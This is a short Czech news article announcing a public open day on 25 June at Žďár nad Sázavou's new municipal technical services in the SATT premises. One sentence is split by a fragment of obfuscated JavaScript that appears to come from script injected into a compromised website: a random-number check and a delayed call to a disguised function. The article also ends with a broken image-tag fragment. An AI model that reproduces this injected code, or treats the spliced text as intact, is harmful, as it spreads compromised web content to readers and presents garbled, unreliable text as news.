Rainbow page separator

Nové technické služby představí obyvatelům Žďáru vozový park

Neděle, 13. června 2021

Žďár nad Sázavou / Prohlídky žďárských technických služeb se budou moci zájemci zúčastnit v areálu firmy SATT v Okružní ulici. Akce pro veřejnost se uskuteční v pátek 25. června v době od 14 do 19 hodin. Ve dvoře firmy návštěvníci uvidí většinu vozidel a další techniky, kterými nové technické služby spadající pod společnost města SATT disponují. V místě bude možnost zakoupení občerstvení a na doprovodný program se mohou těšit i dětští návštěvníci. Mimo to se fandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andům regionálního televizního vysílání naskytne ojedinělá možnost prohlédnout si studio Televize Vysočina, která v objektu SATTu sídlí.
Divize technických služeb byla založena s cílem zajistit zlepšení managementu zakázek a služeb, dispečerskou službu a obecně rychlejší reakce, například v souvislosti se zimní údržbou městských komunikací. Loni v létě začaly nové žďárské technické služby zajišťovat nejdříve údržbu zeleně ve městě mimo sečení, poté i údržbu místních komunikací, aby následně jejich techniku, která vyšla na celkem pět milionů korun, prověřila první zima. Letos v květnu začali zaměstnanci sekat i travnaté plochy. Do budoucna se počítá s rozšířením působnosti například na správu veřejného osvětlení, technickou správu budov města či správu dětských hřišť a městského mobiliáře. Tímto způsobem chce žďárská radnice navázat na činnost technických služeb města, které zanikly v 90. letech.

to-zima-224×300.png“ alt=““ width=“224″ height=“300″ />